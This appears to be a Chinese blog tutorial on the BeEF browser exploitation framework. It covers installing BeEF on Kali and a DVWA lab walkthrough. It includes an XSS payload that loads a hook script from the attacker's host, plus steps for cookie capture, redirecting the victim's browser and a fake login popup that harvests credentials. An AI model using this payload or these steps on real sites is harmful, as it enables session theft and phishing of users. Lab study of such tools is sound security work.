0%

'BeEF的使用'

BeEF简介

1、Beef
生成、交付 paylaod
Ruby 语言编写
服务器端:管理 hooked 客户端
客户端:运行与客户端浏览器的 Javascript 脚本(hook)

2、攻击手段
利用 xss 漏洞实现攻击
诱使客户端访问含有 hook 的伪造站点
结合中间人攻击注入 hook 脚本

3、常见用途
键盘记录器
网络扫描
浏览器信息收集
绑定 shell
与 metasploit 集成

安装配置

kali2中自带,菜单图标是一个蓝色公牛。kali4中没有BeEF,使用一键安装
sudo apt-get install beef-xss
vi /usr/share/beef-xss/config.yaml 修改下密码即可

./beef 或 nohup ./beef & (放在后台运行)

输入IP:3000/ui/authentication进行登陆

简单使用

我们从DVWA插入代码

1
<script src="http://IP:3000/hook.js"></script>

beef这里就会返回一个主机,能够看到cookie,窗口标题、长、宽、referer、hostname、hostport等信息
(但是我这靶机明明是centos,检测是win10,搞不懂)

logs中是用户执行键盘鼠标的操作

commands中是一些功能性操作,如
1,获取cookie


2,网页重定向
Browser—>Hooked Domain —>Redirect Browser
相应的,我们的主机也下线了。。。。

3,社工弹窗
最下面Social Engiineering——>Pretty Theft

用户则会收到一个弹窗,输入账号密码,点击login,我们这边将会收到账号密码

具体利用等相关资料,推荐作者NT00,当前共6篇。
https://www.freebuf.com/articles/web/175755.html